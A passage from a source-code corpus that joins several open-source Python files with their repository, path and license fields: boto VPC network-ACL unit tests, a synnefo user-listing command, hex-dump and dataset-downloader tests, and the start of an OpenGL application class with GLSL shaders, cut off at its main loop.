response = self.service_connection.associate_network_acl('acl-5fb85d36', 'subnet-ff669596')
# Note: Not testing proper call to get_all_network_acls!
self.assert_request_parameters({
'Action': 'ReplaceNetworkAclAssociation',
'NetworkAclId': 'acl-5fb85d36',
'AssociationId': 'aclassoc-5c659635'},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, 'aclassoc-17b85d7e')
def test_disassociate_network_acl(self):
self.https_connection.getresponse.side_effect = [
self.create_response(status_code=200, body=self.get_all_network_acls_vpc_body),
self.create_response(status_code=200, body=self.get_all_network_acls_subnet_body),
self.create_response(status_code=200)
]
response = self.service_connection.disassociate_network_acl('subnet-ff669596',
'vpc-5266953b')
# Note: Not testing the proper arguments of either call to get_all_network_acls!
self.assert_request_parameters({
'Action': 'ReplaceNetworkAclAssociation',
'NetworkAclId': 'acl-5566953c',
'AssociationId': 'aclassoc-5c659635'},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, 'aclassoc-17b85d7e')
class TestCreateNetworkAcl(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return b"""
<CreateNetworkAclResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<networkAcl>
<networkAclId>acl-5fb85d36</networkAclId>
<vpcId>vpc-11ad4878</vpcId>
<default>false</default>
<entrySet>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
</entrySet>
<associationSet/>
<tagSet/>
</networkAcl>
</CreateNetworkAclResponse>
"""
def test_create_network_acl(self):
self.set_http_response(status_code=200)
response = self.service_connection.create_network_acl('vpc-11ad4878')
self.assert_request_parameters({
'Action': 'CreateNetworkAcl',
'VpcId': 'vpc-11ad4878'},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response.id, 'acl-5fb85d36')
class DeleteCreateNetworkAcl(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return b"""
<DeleteNetworkAclResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<return>true</return>
</DeleteNetworkAclResponse>
"""
def test_delete_network_acl(self):
self.set_http_response(status_code=200)
response = self.service_connection.delete_network_acl('acl-2cb85d45')
self.assert_request_parameters({
'Action': 'DeleteNetworkAcl',
'NetworkAclId': 'acl-2cb85d45'},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, True)
class TestCreateNetworkAclEntry(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return b"""
<CreateNetworkAclEntryResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<return>true</return>
</CreateNetworkAclEntryResponse>
"""
def test_create_network_acl(self):
self.set_http_response(status_code=200)
response = self.service_connection.create_network_acl_entry(
'acl-2cb85d45', 110, 'udp', 'allow', '0.0.0.0/0', egress=False,
port_range_from=53, port_range_to=53)
self.assert_request_parameters({
'Action': 'CreateNetworkAclEntry',
'NetworkAclId': 'acl-2cb85d45',
'RuleNumber': 110,
'Protocol': 'udp',
'RuleAction': 'allow',
'Egress': 'false',
'CidrBlock': '0.0.0.0/0',
'PortRange.From': 53,
'PortRange.To': 53},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, True)
def test_create_network_acl_icmp(self):
self.set_http_response(status_code=200)
response = self.service_connection.create_network_acl_entry(
'acl-2cb85d45', 110, 'udp', 'allow', '0.0.0.0/0', egress='true',
icmp_code=-1, icmp_type=8)
self.assert_request_parameters({
'Action': 'CreateNetworkAclEntry',
'NetworkAclId': 'acl-2cb85d45',
'RuleNumber': 110,
'Protocol': 'udp',
'RuleAction': 'allow',
'Egress': 'true',
'CidrBlock': '0.0.0.0/0',
'Icmp.Code': -1,
'Icmp.Type': 8},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, True)
class TestReplaceNetworkAclEntry(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return b"""
<ReplaceNetworkAclEntryResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<return>true</return>
</ReplaceNetworkAclEntryResponse>
"""
def test_replace_network_acl(self):
self.set_http_response(status_code=200)
response = self.service_connection.replace_network_acl_entry(
'acl-2cb85d45', 110, 'tcp', 'deny', '0.0.0.0/0', egress=False,
port_range_from=139, port_range_to=139)
self.assert_request_parameters({
'Action': 'ReplaceNetworkAclEntry',
'NetworkAclId': 'acl-2cb85d45',
'RuleNumber': 110,
'Protocol': 'tcp',
'RuleAction': 'deny',
'Egress': 'false',
'CidrBlock': '0.0.0.0/0',
'PortRange.From': 139,
'PortRange.To': 139},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, True)
def test_replace_network_acl_icmp(self):
self.set_http_response(status_code=200)
response = self.service_connection.replace_network_acl_entry(
'acl-2cb85d45', 110, 'tcp', 'deny', '0.0.0.0/0',
icmp_code=-1, icmp_type=8)
self.assert_request_parameters({
'Action': 'ReplaceNetworkAclEntry',
'NetworkAclId': 'acl-2cb85d45',
'RuleNumber': 110,
'Protocol': 'tcp',
'RuleAction': 'deny',
'CidrBlock': '0.0.0.0/0',
'Icmp.Code': -1,
'Icmp.Type': 8},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, True)
class TestDeleteNetworkAclEntry(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return b"""
<DeleteNetworkAclEntryResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<return>true</return>
</DeleteNetworkAclEntryResponse>
"""
def test_delete_network_acl(self):
self.set_http_response(status_code=200)
response = self.service_connection.delete_network_acl_entry('acl-2cb85d45', 100,
egress=False)
self.assert_request_parameters({
'Action': 'DeleteNetworkAclEntry',
'NetworkAclId': 'acl-2cb85d45',
'RuleNumber': 100,
'Egress': 'false'},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, True)
class TestGetNetworkAclAssociations(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return b"""
<DescribeNetworkAclsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<networkAclSet>
<item>
<networkAclId>acl-5d659634</networkAclId>
<vpcId>vpc-5266953b</vpcId>
<default>false</default>
<entrySet>
<item>
<ruleNumber>110</ruleNumber>
<protocol>6</protocol>
<ruleAction>allow</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
<portRange>
<from>49152</from>
<to>65535</to>
</portRange>
</item>
</entrySet>
<associationSet>
<item>
<networkAclAssociationId>aclassoc-c26596ab</networkAclAssociationId>
<networkAclId>acl-5d659634</networkAclId>
<subnetId>subnet-f0669599</subnetId>
</item>
</associationSet>
<tagSet/>
</item>
</networkAclSet>
</DescribeNetworkAclsResponse>
"""
def test_get_network_acl_associations(self):
self.set_http_response(status_code=200)
api_response = self.service_connection.get_all_network_acls()
association = api_response[0].associations[0]
self.assertEqual(association.network_acl_id, 'acl-5d659634')
if __name__ == '__main__':
unittest.main()
| mit |
konsP/synnefo | snf-astakos-app/astakos/im/management/commands/user-list.py | 10 | 4358 | # Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from optparse import make_option
from astakos.im.models import AstakosUser
from snf_django.management.commands import ListCommand
def get_providers(user):
return ','.join(
[unicode(auth) for auth in user.auth_providers.filter(active=True)]
)
def get_groups(user):
return ','.join(user.groups.all().values_list('name', flat=True))
class Command(ListCommand):
help = "List users"
object_class = AstakosUser
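# Each FIELDS entry maps a field name to (model attribute or callable, help
# text) for ListCommand to render.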
FIELDS = {
'id': ('id', ('The id of the user')),
'realname': ('realname', 'The name of the user'),
'active': ('is_active', 'Whether the user is active or not'),
'verified':
('email_verified', 'Whether the user has a verified email address'),
'moderated':
('moderated', 'Account moderated'),
'admin': ('is_superuser', 'Whether the user is admin or not'),
'uuid': ('uuid', 'The uuid of the user'),
'providers': (get_providers,
'The authentication providers of the user'),
'activation_sent': ('activation_sent',
'The date activation sent to the user'),
'displayname': ('username', 'The display name of the user'),
'groups': (get_groups, 'The groups of the user'),
'last_login_details': ('last_login_info_display',
'User last login dates for each login method'),
'last_login': ('last_login', 'User last login date')
}
fields = ['id', 'displayname', 'realname', 'uuid', 'active', 'admin']
option_list = ListCommand.option_list + (
make_option('--auth-providers',
action='store_true',
dest='auth_providers',
default=False,
help="Display user authentication providers"),
make_option('--group',
action='append',
dest='groups',
default=None,
metavar="GROUP",
help="Only show users that belong to the specified"
" group. Can be used multiple times."),
make_option('--active',
action='store_true',
dest='active',
default=False,
help="Display only active users"),
make_option('--pending-moderation',
action='store_true',
dest='pending_moderation',
default=False,
help="Display unmoderated users"),
make_option('--pending-verification',
action='store_true',
dest='pending_verification',
default=False,
help="Display unverified users"),
make_option("--display-mails",
dest="displayname",
action="store_true",
default=False,
help="Display user email (enabled by default)")
)
def handle_args(self, *args, **options):
if options['active']:
self.filters['is_active'] = True
if options['pending_moderation']:
self.filters['email_verified'] = True
self.filters['moderated'] = False
if options['pending_verification']:
self.filters['email_verified'] = False
if options['groups']:
self.filters['groups__name__in'] = options['groups']
if options['auth_providers']:
self.fields.extend(['providers'])
DISPLAYNAME = 'displayname'
if options[DISPLAYNAME] and DISPLAYNAME not in self.fields:
self.fields.extend([DISPLAYNAME])
| gpl-3.0 |
dhylands/bioloid3 | tests/test_dump_mem.py | 1 | 4201 | #!/usr/bin/env python3
# This file tests the dump_mem hex-dump helper
import unittest
import binascii
from bioloid.dump_mem import dump_mem
PREFIX = ' Prefix'
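# The expected strings below pin down dump_mem's output format: bytes are
# rendered as hex, 16 per line by default (line_width overrides this), with
# an optional address column and ASCII gutter. The keyword arguments
# exercised here are prefix, addr, line_width, show_addr, show_ascii and log.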
class TestDumpMem(unittest.TestCase):
def clear_log(self):
self.log_lines = []
def log(self, str):
self.log_lines.append(str)
#print(str)
def test_empty_buffer(self):
self.clear_log()
dump_mem(b'', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix:No data'
])
def test_less_than_one_line(self):
self.clear_log()
dump_mem(b'0123', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 0123'
])
def test_less_than_one_line_no_ascii(self):
self.clear_log()
dump_mem(b'0123', prefix=PREFIX, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33'
])
def test_exactly_one_line(self):
self.clear_log()
dump_mem(b'0123456789ABCDEF', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF'
])
def test_exactly_one_line_no_ascii(self):
self.clear_log()
dump_mem(b'0123456789ABCDEF', prefix=PREFIX, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46'
])
def test_a_bit_more_than_a_line(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
' Prefix: 0010: 47 G'
])
def test_a_bit_more_than_a_line_no_ascii(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', prefix=PREFIX, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46',
' Prefix: 0010: 47'
])
def test_no_prefix(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', log=self.log)
self.assertEqual(self.log_lines, [
'0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
'0010: 47 G'
])
def test_no_prefix_no_addr(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', show_addr=False, log=self.log)
self.assertEqual(self.log_lines, [
'30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
'47 G'
])
def test_no_prefix_no_addr_no_ascii(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', show_addr=False, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
'30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46',
'47'
])
def test_addr(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', addr=0x1234, log=self.log)
self.assertEqual(self.log_lines, [
'1234: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
'1244: 47 G'
])
def test_addr_line_width(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', addr=0x1234, line_width=8, log=self.log)
self.assertEqual(self.log_lines, [
'1234: 30 31 32 33 34 35 36 37 01234567',
'123c: 38 39 41 42 43 44 45 46 89ABCDEF',
'1244: 47 G'
])
def test_non_printable(self):
self.clear_log()
dump_mem(b'012\x00\x01\x1e\x1f456', log=self.log)
self.assertEqual(self.log_lines, [
'0000: 30 31 32 00 01 1e 1f 34 35 36 012....456',
])
def test_neg_line_width(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', prefix=PREFIX, line_width=-6, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
' Prefix: 0010: 47 G'
])
if __name__ == '__main__':
unittest.main()
| mit |
datasciencebr/serenata-toolbox | tests/unit/test_datasets_downloader.py | 1 | 4433 | import asyncio
import os
from concurrent.futures import TimeoutError
from unittest import TestCase
from unittest.mock import Mock, patch
from aiohttp import ClientSession
from serenata_toolbox.datasets.downloader import Downloader
class TestDownloader(TestCase):
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_init(self, exists, isdir):
exists.return_value = True
isdir.return_value = True
downloader = Downloader('test', timeout=1)
self.assertEqual(os.path.abspath('test'), downloader.target)
self.assertEqual(0, downloader.total)
self.assertEqual(1, downloader.timeout)
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_init_no_timeout(self, exists, isdir):
downloader = Downloader('test')
self.assertEqual(None, downloader.timeout)
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_init_no_existing_target(self, exists, isdir):
exists.return_value = False
isdir.return_value = True
with self.assertRaises(FileNotFoundError):
Downloader('test')
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_init_file_target(self, exists, isdir):
exists.return_value = True
isdir.return_value = False
with self.assertRaises(FileNotFoundError):
Downloader('test')
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_download_no_file(self, exists, isdir):
exists.return_value = True
isdir.return_value = True
downloader = Downloader('test')
self.assertIsNone(downloader.download(''))
self.assertIsNone(downloader.download([]))
@patch.object(Downloader, 'main')
@patch('serenata_toolbox.datasets.downloader.asyncio')
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_download_single_file(self, exists, isdir, asyncio_, main):
exists.return_value = True
isdir.return_value = True
downloader = Downloader('test')
downloader.download('test.xz')
asyncio_.get_event_loop.assert_called_with()
loop = asyncio_.get_event_loop.return_value
self.assertTrue(loop.run_until_complete.called)
main.assert_called_once_with(loop, ('test.xz',))
@patch.object(Downloader, 'main')
@patch('serenata_toolbox.datasets.downloader.asyncio')
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_download_multiple_files(self, exists, isdir, asyncio_, main):
exists.return_value = True
isdir.return_value = True
downloader = Downloader('test')
downloader.download(range(3))
asyncio_.get_event_loop.assert_called_with()
loop = asyncio_.get_event_loop.return_value
self.assertTrue(loop.run_until_complete.called)
main.assert_called_once_with(loop, (1, 2))
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_url(self, exists, isdir):
exists.return_value = True
isdir.return_value = True
downloader = Downloader('test')
expected = 'https://nyc3.digitaloceanspaces.com/serenata-de-amor-data/test.xz'
self.assertEqual(expected, downloader.url('test.xz'))
@patch('serenata_toolbox.datasets.downloader.os.path.isdir')
@patch('serenata_toolbox.datasets.downloader.os.path.exists')
def test_download_timeout(self, exists, isdir):
exists.return_value = True
isdir.return_value = True
with self.assertRaises(TimeoutError):
            downloader = Downloader('test', timeout=0.001)
            downloader.url = Mock(return_value="http://www.google.com:81/")
            loop = asyncio.get_event_loop()
            with ClientSession(loop=loop) as client:
                loop.run_until_complete(
                    downloader.fetch_file(client, '2016-12-06-reibursements.xz'))
| mit |
embisi-github/gjslib | python/gjslib/graphics/opengl_app.py | 1 | 32413 | #!/usr/bin/env python
#a Imports
from OpenGL.GLUT import *
from OpenGL.GLU import *
from OpenGL.GL import *
from OpenGL.GL import shaders
import sys
import traceback
import math
from gjslib.math import quaternion, matrix, vectors
import OpenGL.arrays.vbo as vbo
import numpy
#a Default shaders
shader_code={}
shader_code["standard_vertex"] = """
#version 330 core
layout(location = 0) in vec3 V_m;
layout(location = 1) in vec2 V_UV;
layout(location = 2) in vec3 N_m;
out vec2 UV;
out vec3 V_w;
out vec3 V_c;
uniform mat4 M;
uniform mat4 V;
uniform mat4 P;
void main(){
V_w = (M * vec4(V_m,1)).xyz + 0*N_m;// Use N_m or lose it...
V_c = (V * M * vec4(V_m,1)).xyz;
gl_Position = P * V * M * vec4(V_m,1);
UV = V_UV;
}
"""
shader_code["standard_fragment"] = """
#version 330 core
in vec3 V_m;
in vec2 V_UV;
in vec3 N_m;
out vec4 color;
uniform vec3 C;
void main(){
color = vec4(C,1);
}
"""
shader_code["texture_fragment"] = """
#version 330 core
in vec3 V_w;
in vec2 UV;
in vec3 V_c;
out vec3 color;
uniform sampler2D sampler;
void main(){
color = texture(sampler,UV).rgb*0.7;
}
"""
shader_code["font_fragment"] = """
#version 330 core
in vec3 V_w;
in vec2 UV;
in vec3 V_c;
out vec4 color;
uniform sampler2D sampler;
uniform vec3 C;
void main(){
color = texture(sampler,UV).r * vec4(C,1.0);
if (texture(sampler,UV).r<0.1) discard;
}
"""
#a Shader classes - move to opengl_shader
class c_opengl_shader(object):
#f __init__
def __init__(self):
pass
#f compile
def compile(self):
self.vao = glGenVertexArrays(1)
glBindVertexArray(self.vao)
self.vertex_shader = shaders.compileShader(self.vertex_src, GL_VERTEX_SHADER)
self.fragment_shader = shaders.compileShader(self.fragment_src, GL_FRAGMENT_SHADER)
self.program = shaders.compileProgram(self.vertex_shader, self.fragment_shader)
self.attrib_ids = {}
for k in self.attribs:
self.attrib_ids[k] = glGetAttribLocation(self.program,k)
pass
self.uniform_ids = {}
for k in self.uniforms:
self.uniform_ids[k] = glGetUniformLocation(self.program,k)
pass
for k in self.attrib_ids:
if self.attrib_ids[k]==-1:
raise Exception("Failed to create attribute",k)
pass
for k in self.uniform_ids:
if self.uniform_ids[k]==-1:
raise Exception("Failed to create uniform",k)
pass
pass
#f use
def use(self):
shaders.glUseProgram(self.program)
pass
#f bind_vbo
def bind_vbo(self, t=None, v=None, n=None, uv=None, **kwargs):
from ctypes import sizeof, c_float, c_void_p, c_uint
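        # Positional arguments describe vertex attributes as offsets into a
        # record of 't' floats: 'v', 'n' and 'uv' are offsets (in floats) of
        # the position, normal and texture coordinates; remaining keyword
        # arguments are uploaded as uniforms according to their type/length.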
for (d,k,s) in ( (v,"V_m",3), (n,"N_m",3), (uv,"V_UV",2) ):
if d is not None and k in self.attrib_ids:
glEnableVertexAttribArray(self.attrib_ids[k])
glVertexAttribPointer(self.attrib_ids[k], s, GL_FLOAT, GL_FALSE, t*sizeof(c_float), c_void_p(d*sizeof(c_float)) )
pass
for (k,v) in kwargs.iteritems():
if k in self.uniform_ids:
if type(v)==float:
                    glUniform1f(self.uniform_ids[k],v)
pass
elif len(v)==3:
glUniform3f(self.uniform_ids[k],v[0],v[1],v[2])
pass
elif len(v)==4:
glUniform4f(self.uniform_ids[k],v[0],v[1],v[2],v[3])
pass
pass
pass
pass
#f set_matrices
def set_matrices(self, matrix_stacks):
glUniformMatrix4fv(self.uniform_ids["M"],1,GL_TRUE,matrix_stacks["model"][-1].get_matrix())
glUniformMatrix4fv(self.uniform_ids["V"],1,GL_TRUE,matrix_stacks["view"][-1].get_matrix())
glUniformMatrix4fv(self.uniform_ids["P"],1,GL_TRUE,matrix_stacks["project"][-1].get_matrix())
pass
#f All done
pass
#c c_opengl_shader_color_standard
class c_opengl_shader_color_standard(c_opengl_shader):
vertex_src = shader_code["standard_vertex"]
fragment_src = shader_code["standard_fragment"]
attribs = ("V_m", "V_UV", "N_m")
uniforms = ("M", "V", "P", "C")
pass
#c c_opengl_shader_texture_standard
class c_opengl_shader_texture_standard(c_opengl_shader):
vertex_src = shader_code["standard_vertex"]
fragment_src = shader_code["texture_fragment"]
attribs = ("V_m", "V_UV", "N_m")
uniforms = ("M", "V", "P")
pass
#c c_opengl_shader_font_standard
class c_opengl_shader_font_standard(c_opengl_shader):
vertex_src = shader_code["standard_vertex"]
fragment_src = shader_code["font_fragment"]
attribs = ("V_m", "V_UV", "N_m")
uniforms = ("M", "V", "P", "C")
pass
#a Class for c_opengl
#c c_opengl_app
class c_opengl_app(object):
window_title = "opengl_main"
#f __init__
def __init__(self, window_size):
self.window_size = window_size
self.display_has_errored = False
self.fonts = {}
self.display_matrices = {"model": [matrix.c_matrixNxN(order=4).identity()],
"view": [matrix.c_matrixNxN(order=4).identity()],
"project":[matrix.c_matrixNxN(order=4).identity()],
}
self.clips = []
self.selected_shader = None
self.simple_object = {}
self.simple_object["cross"] = {"vectors":vbo.VBO(data=numpy.array([1.0,0.2,0, -1.0,0.2,0, 1.0,-0.2,0, -1.0,-0.2,0,
0.2,1.0,0, 0.2,-1.0,0, -0.2,1.0,0, -0.2,-1.0,0, ],
dtype=numpy.float32), target=GL_ARRAY_BUFFER ),
"indices":vbo.VBO(data=numpy.array([0,1,2,1,2,3,4,5,6,5,6,7],
dtype=numpy.uint8), target=GL_ELEMENT_ARRAY_BUFFER ),
}
self.simple_object["diamond"] = {"vectors":vbo.VBO(data=numpy.array([1,0,0, -1,0,0, 0,1,0, 0,-1,0, 0,0,1, 0,0,-1],
dtype=numpy.float32), target=GL_ARRAY_BUFFER ),
"indices":vbo.VBO(data=numpy.array([0,2,4, 0,2,5, 0,3,4, 0,3,5,
1,2,4, 1,2,5, 1,3,4, 1,3,5],
dtype=numpy.uint8), target=GL_ELEMENT_ARRAY_BUFFER ),
}
pass
#f window_xy
def window_xy(self, xy):
return ((xy[0]+1.0)*self.window_size[0]/2, (xy[1]+1.0)*self.window_size[1]/2)
#f uniform_xy
def uniform_xy(self, xy):
return (-1.0+2*float(xy[0])/self.window_size[0], -1.0+2*float(xy[1])/self.window_size[1])
#f attach_menu
def attach_menu(self, menu, name):
glutSetMenu(menu.glut_id(name))
glutAttachMenu(GLUT_RIGHT_BUTTON)
pass
#f clip_push
def clip_push(self, x,y,w,h):
"""
Can do clipping also by giving portions of the depth buffer space to different levels; each time you push you go farther back into the depth buffer
Can do clipping using a clip volume in the fragment shader using a clip transformation (of MVP vector to clip volume - discard if outside unit cube)
Can do clipping by overwriting the depth buffer
"""
x,y,w,h = int(x),int(y),int(w),int(h)
self.clips.append((x,y,w,h))
glViewport(x,y,w,h)
glScissor(x,y,w,h)
glEnable(GL_SCISSOR_TEST)
pass
#f clip_pop
def clip_pop(self, matrix="model"):
self.clips.pop()
if len(self.clips)==0:
(x,y,w,h) = (0,0,self.window_size[0],self.window_size[1])
glDisable(GL_SCISSOR_TEST)
pass
else:
(x,y,w,h) = self.clips[-1]
pass
glViewport(x,y,w,h)
glScissor(x,y,w,h)
pass
#f matrix_push
def matrix_push(self, matrix="model"):
m = self.display_matrices[matrix][-1].copy()
self.display_matrices[matrix].append(m)
if len(self.display_matrices[matrix])>100:
raise Exception("Too many matrices pushed")
pass
#f matrix_pop
def matrix_pop(self, matrix="model"):
m = self.display_matrices[matrix].pop()
pass
#f matrix_mult
def matrix_mult(self, by, matrix="model"):
self.display_matrices[matrix][-1].postmult(by)
pass
#f matrix_scale
def matrix_scale(self, scale=1.0, matrix="model"):
if type(scale)==float:
scale = (scale,scale,scale,1.0)
pass
self.display_matrices[matrix][-1].scale(scale)
pass
#f matrix_rotate
def matrix_rotate(self, angle, axis, matrix="model"):
q = quaternion.c_quaternion.of_rotation(angle=angle, axis=axis, degrees=True)
self.display_matrices[matrix][-1].postmult(q.get_matrixn(order=4))
pass
#f matrix_translate
def matrix_translate(self, translate, matrix="model"):
self.display_matrices[matrix][-1].translate(translate)
pass
#f matrix_set
def matrix_set(self, m, matrix="project"):
self.display_matrices[matrix][-1] = m
pass
#f matrix_identity
def matrix_identity(self, matrix="model"):
self.display_matrices[matrix][-1].identity()
pass
#f matrix_perspective
def matrix_perspective(self, fovx=None, fovy=None, aspect=1.0, zNear=None, zFar=None, matrix="project"):
m = self.display_matrices[matrix][-1]
for r in range(4):
for c in range(4):
m[r,c] = 0.0
pass
pass
if fovx is None:
fy = 1/math.tan(math.radians(fovy)/2)
fx = fy/aspect
pass
else:
fx = 1/math.tan(math.radians(fovx)/2)
if fovy is None:
fy = fx*aspect
pass
else:
fy = 1/math.tan(math.radians(fovy)/2)
pass
pass
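        # Standard perspective projection entries; the matrix is built
        # row-major here and handed to GL with transpose=GL_TRUE, so:
        #   [ fx  0    0                      0               ]
        #   [ 0   fy   0                      0               ]
        #   [ 0   0   (zN+zF)/(zN-zF)   2*zN*zF/(zN-zF)       ]
        #   [ 0   0   -1                      0               ]
        # with fx = 1/tan(fovx/2) and fy = 1/tan(fovy/2).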
m[0,0] = fx
m[1,1] = fy
m[2,2] = (zNear+zFar)/(zNear-zFar)
m[2,3] = 2*zNear*zFar/(zNear-zFar)
m[3,2] = -1.0
pass
#f matrix_use
def matrix_use(self):
self.selected_shader.set_matrices(self.display_matrices)
pass
#f shaders_compile
def shaders_compile(self):
self.shaders = {}
self.shaders["color_standard"] = c_opengl_shader_color_standard()
self.shaders["texture_standard"] = c_opengl_shader_texture_standard()
self.shaders["font_standard"] = c_opengl_shader_font_standard()
for k in self.shaders:
self.shaders[k].compile()
pass
#f shader_set_attributes
def shader_set_attributes(self, **kwargs):
self.selected_shader.bind_vbo(**kwargs)
pass
#f shader_use
def shader_use(self,shader_name="color_standard"):
self.selected_shader = self.shaders[shader_name]
self.selected_shader.use()
pass
#f draw_simple_object
def draw_simple_object(self, obj, c, xyz, sc, angle=0, axis=(0,0,1)):
self.matrix_push()
self.matrix_translate(xyz)
self.matrix_rotate(angle, axis)
self.matrix_scale(sc)
self.matrix_use()
self.simple_object[obj]["vectors"].bind()
self.simple_object[obj]["indices"].bind()
self.shader_set_attributes( t=3, v=0, C=c )
glDrawElements(GL_TRIANGLES,len(self.simple_object[obj]["indices"]),GL_UNSIGNED_BYTE, None)
self.simple_object[obj]["vectors"].unbind()
self.simple_object[obj]["indices"].unbind()
self.matrix_pop()
pass
#f draw_lines
def draw_lines(self, line_data):
vectors = vbo.VBO(data=numpy.array(line_data, dtype=numpy.float32), target=GL_ARRAY_BUFFER )
vectors.bind()
self.shader_set_attributes(t=3, v=0)
glDrawArrays(GL_LINES,0,len(line_data))
vectors.unbind()
pass
#f init_opengl
def init_opengl(self):
glutInit(sys.argv)
glutInitDisplayMode(GLUT_3_2_CORE_PROFILE |GLUT_DOUBLE | GLUT_RGB | GLUT_DEPTH)
glutInitWindowSize(self.window_size[0],self.window_size[1])
glutCreateWindow(self.window_title)
#print glGetString(GL_VERSION)
self.shaders_compile()
self.shader_use()
glClearColor(0.,0.,0.,1.)
#glShadeModel(GL_SMOOTH)
#glEnable(GL_CULL_FACE)
glEnable(GL_DEPTH_TEST)
self.opengl_post_init()
pass
#f opengl_post_init
def opengl_post_init(self):
"""Subclass should provide this"""
pass
#f main_loop
def main_loop(self):
